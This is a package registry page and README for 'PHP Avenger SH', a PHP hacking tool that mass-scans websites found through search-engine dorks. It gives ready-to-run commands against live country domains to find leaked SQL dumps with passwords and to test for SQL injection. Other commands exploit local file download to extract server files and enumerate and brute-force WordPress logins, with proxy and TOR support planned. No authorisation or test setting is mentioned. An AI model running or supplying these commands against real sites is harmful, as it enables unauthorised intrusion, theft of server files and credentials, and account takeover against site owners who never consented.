aszone / avenger-sh
AsZone Component - Search Hacking Tool
Installs: 380
Dependents: 0
Suggesters: 0
Security: 0
Stars: 222
Watchers: 18
Forks: 41
Open Issues: 3
Requires
- php: >=5.3.9
- aszone/hacking: ~0.1
- aszone/search-hacking: ~0.1
- aszone/simple_html_dom: ~1.5
- aszone/vulnerabilities: ~0.1.1
- knplabs/console-service-provider: ^1.0
- lenonleite/exploits: ~0.1
- swiftmailer/swiftmailer: ^5.4
This package is not auto-updated.
Last update: 2025-02-05 22:39:43 UTC
README
PHP Avenger is a modern collection of open source tools written in PHP with focus in security and hacking.
Beta
- PHP Avenger sh ( Search Engine )
Future Implementation
- PHP Avenger bt ( Brute - Force )
- PHP Avenger sca ( State Code Analyse )
- PHP Avenger pwp ( Plugin WordPress )
- PHP Avenger cj ( Component Joomla )
PHP Avenger SH
Php Avenger sh is a open source tool with an idea based in a fork inurlbr by Cleiton Pinheiro. Basically PHP Avenger sh is a tool that automates the process of detecting possible vulnerabilities using mass scan and checking if the vulnerability is true or false. Php Avenger uses search engines like google, bing and others through dorks ( advanced search ).
Installation
The recommended way to install PHP Avenger is through Composer.
# Install Composer curl -sS https://getcomposer.org/installer | php
Next, run the Composer command to install the latest beta version of Php Avenger SH:
php composer.phar create-project aszone/avenger-sh
cd avenger-sh
Basic Usage
Use the commands bellow to init the process, results will be printed in the monitor and saved in a
.txt
file on folderresults
.
Get trash search
php avenger sh --dork="site:com.ar ext:sql password"
Result of trash search
Check Sql Injection
php avenger sh --dork="site:com.ar inurl:php?id=" --check="sqli"
Result of Sql Injection
Check Local File Download
php avenger sh --dork="site:com.ar inurl:download.php?file=" --check="lfd"
Result of Local File Download
Check and Exploited Local File Download
This next command you will check vulnerabilities and extract files of server. The files will save in /results/exploits/lfd/
php avenger sh --dork="site:com.mx inurl:download.php?file=" --check="lfd" --exploit="lfd"
Result of Extract Files
Video of Extract Files
Check is Admin Page
php avenger sh --dork="site:com.ar inurl:admin" --check="isAdmin"
Check is Admin Page and if Admin Page for WordPress get all users and start brute force
php avenger sh --dork="site:com inurl:wp-content/uploads" --check="isAdmin" --exploit="btwp"
Help for commands
php avenger sh
Details
Search Engines
- GoogleApi
- Bing
- DuckDuckGo
- Yahoo
- Yandex
Covered Vulnerabilities
- Sql Injection (SQLI)
- Local File Download (LFD)
- Admin Page
- Remote File Inclusion (RFI)
- Cross-Site-Scripting (XSS)
Covered Exploits
- Local File Download (LFD)
- Brute Force for WordPress
Covered Vulnerabilities in next versions
- Sensitive Files
- Dump Files
- Config Files
- Open Folders
Features under development
- Power Search
- Send E-mail with results
- Naming the
.txt
result file - Proxys
- TOR
- Site of Proxys
- Virgin Proxies